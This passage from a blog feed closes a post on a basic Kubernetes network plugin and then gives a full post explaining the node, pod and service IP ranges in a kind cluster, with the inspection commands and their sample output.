<p>This was a quick look at a very simple CNI implementation, and how it all works will vary depending on the network plugin(s) you use. If you’re looking for a more in-depth treatment of what we’ve discussed here, I’d recommend <a href="https://www.tkng.io/">The Kubernetes Networking Guide</a> which has a lot of information on this topic and others.</p>

Thu, 07 Nov 2024 12:00:00 +0000 https://raesene.github.io/blog/2024/11/07/Exploring-a-basic-Kubernetes-Network-Plugin/ https://raesene.github.io/blog/2024/11/07/Exploring-a-basic-Kubernetes-Network-Plugin/ The Many IP Addresses of Kubernetes

<p>When getting to grips with Kubernetes one of the more complex concepts to understand is … all the IP addresses! Even looking at a simple cluster setup, you’ll get addresses in multiple different ranges. So this is a quick post to walk through where they’re coming from and what they’re used for.</p>

<p>Typically you can see at least three distinct ranges of IP addresses in a Kubernetes cluster, although this can vary depending on the distribution and container networking solution in place. Firstly there is the node network, where the containers, virtual machines or physical servers running the Kubernetes components are; then there is an overlay network where pods are assigned IP addresses; and lastly another network range where Kubernetes services are located.</p>

<p>We’ll start with a standard <a href="https://kind.sigs.k8s.io/">kind</a> cluster before talking about some other sources of IP address complexity.
We’ll start by running <code class="language-plaintext highlighter-rouge">kind create cluster</code> to get it up and running.</p>

<p>Once we’ve got the cluster started we can see what IP address the node has by running <code class="language-plaintext highlighter-rouge">docker exec -it kind-control-plane ip addr show dev eth0</code>. The output of that command should look something like this</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>13: eth0@if14: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc noqueue state UP group default
    link/ether 02:42:ac:12:00:02 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet 172.18.0.2/16 brd 172.18.255.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fc00:f853:ccd:e793::2/64 scope global nodad
       valid_lft forever preferred_lft forever
    inet6 fe80::42:acff:fe12:2/64 scope link
       valid_lft forever preferred_lft forever
</code></pre></div></div>

<p>We can see that the address assigned is <code class="language-plaintext highlighter-rouge">172.18.0.2/16</code>, which is a network controlled by Docker (as we’re running our cluster on top of Docker). If you have a virtual machine or physical server the IP addresses will be in whatever range is assigned to the network(s) the host has.</p>

<p>So far, so simple. Now let’s add a workload to our cluster and see what addresses are assigned there. Let’s start a webserver workload with <code class="language-plaintext highlighter-rouge">kubectl run webserver --image=nginx</code>. Once that pod starts we can run <code class="language-plaintext highlighter-rouge">kubectl get pods webserver -o wide</code> to see what IP address has been assigned to the pod.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>NAME        READY   STATUS    RESTARTS   AGE   IP           NODE                 NOMINATED NODE   READINESS GATES
webserver   1/1     Running   0          42s   10.244.0.5   kind-control-plane   &lt;none&gt;           &lt;none&gt;
</code></pre></div></div>

<p>Our pod has an IP address of <code class="language-plaintext highlighter-rouge">10.244.0.5</code> which is in an entirely different subnet! This IP address is part of the overlay network that most (but not all) Kubernetes distributions use for their workloads. This subnet is generally automatically assigned by the Kubernetes <a href="https://kubernetes.io/docs/concepts/extend-kubernetes/compute-storage-net/network-plugins/">network plugin</a> used in the cluster, so it’ll change based on the plugin in use and any specific configuration for that plugin. What’s happening here is that our Kubernetes node has created a <code class="language-plaintext highlighter-rouge">veth</code> interface for our pod and assigned that address to it.</p>
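<p>If you want to see those <code class="language-plaintext highlighter-rouge">veth</code> interfaces directly, a quick check from outside the node works too (a sketch; the interface names will be different on your cluster):</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code># List the veth interfaces the node has created, one per running pod, each
# paired with an interface inside that pod's network namespace.
docker exec kind-control-plane ip -brief link show type veth
</code></pre></div></div>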
<p>We can see the pod IP addresses from the host’s perspective by running <code class="language-plaintext highlighter-rouge">docker exec kind-control-plane ip route</code>, which shows the IP addresses assigned to the different pods in the cluster, including the IP address we saw from our <code class="language-plaintext highlighter-rouge">get pods</code> command above.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>default via 172.18.0.1 dev eth0
10.244.0.2 dev veth9ee91973 scope host
10.244.0.3 dev veth1b82cd96 scope host
10.244.0.4 dev veth38302a10 scope host
10.244.0.5 dev vethf915cecb scope host
172.18.0.0/16 dev eth0 proto kernel scope link src 172.18.0.2
</code></pre></div></div>

<p>Now that we’ve got the node network and the pod network, let’s see what happens if we add a Kubernetes <a href="https://kubernetes.io/docs/concepts/services-networking/service/">service</a> to the mix. We can do this by running <code class="language-plaintext highlighter-rouge">kubectl expose pod webserver --port 8080</code>, which will create a service object for our webserver pod. There are several types of service object, but by default a ClusterIP service will be created, which provides an IP address which is visible inside the cluster, but not outside it. Once our service is created we can look at the IP address by running <code class="language-plaintext highlighter-rouge">kubectl get services webserver</code></p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>NAME        TYPE        CLUSTER-IP     EXTERNAL-IP   PORT(S)    AGE
webserver   ClusterIP   10.96.198.83   &lt;none&gt;        8080/TCP   97s
</code></pre></div></div>

<p>We can see from the output that the IP address is <code class="language-plaintext highlighter-rouge">10.96.198.83</code>, which is in yet another IP address range! This range is set by a command line flag on the Kubernetes API server. In the case of our kind cluster, it looks like this: <code class="language-plaintext highlighter-rouge">--service-cluster-ip-range=10.96.0.0/16</code>.</p>

<p>But from a host perspective, where does this IP address fit in? Well, the reality of Kubernetes service objects is that, by default, they’re iptables rules created by the <code class="language-plaintext highlighter-rouge">kube-proxy</code> service on the node.
We can see our webserver service by running this command: <code class="language-plaintext highlighter-rouge">docker exec kind-control-plane iptables -t nat -L KUBE-SERVICES -v -n --line-numbers</code></p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Chain KUBE-SERVICES (2 references)
num   pkts bytes target                     prot opt in     out    source       destination
1        1    60 KUBE-SVC-NPX46M4PTMTKRN6Y  6    --  *      *      0.0.0.0/0    10.96.0.1      /* default/kubernetes:https cluster IP */ tcp dpt:443
2        0     0 KUBE-SVC-UMJOY2TYQGVV2BKY  6    --  *      *      0.0.0.0/0    10.96.198.83   /* default/webserver cluster IP */ tcp dpt:8080
3        0     0 KUBE-SVC-TCOU7JCQXEZGVUNU  17   --  *      *      0.0.0.0/0    10.96.0.10     /* kube-system/kube-dns:dns cluster IP */ udp dpt:53
4        0     0 KUBE-SVC-ERIFXISQEP7F7OF4  6    --  *      *      0.0.0.0/0    10.96.0.10     /* kube-system/kube-dns:dns-tcp cluster IP */ tcp dpt:53
5        0     0 KUBE-SVC-JD5MR3NA4I4DYORP  6    --  *      *      0.0.0.0/0    10.96.0.10     /* kube-system/kube-dns:metrics cluster IP */ tcp dpt:9153
6     7757  465K KUBE-NODEPORTS             0    --  *      *      0.0.0.0/0    0.0.0.0/0      /* kubernetes service nodeports; NOTE: this must be the last rule in this chain */ ADDRTYPE match dst-type LOCAL
</code></pre></div></div>

<h2 id="conclusion">Conclusion</h2>

<p>The goal of this post was just to explore a couple of concepts. Firstly, the variety of IP addresses you’re likely to see in a Kubernetes cluster and then how those tie to the operating system level.</p>

Fri, 01 Nov 2024 08:00:00 +0000 https://raesene.github.io/blog/2024/11/01/The-Many-IP-Addresses-Of-Kubernetes/ https://raesene.github.io/blog/2024/11/01/The-Many-IP-Addresses-Of-Kubernetes/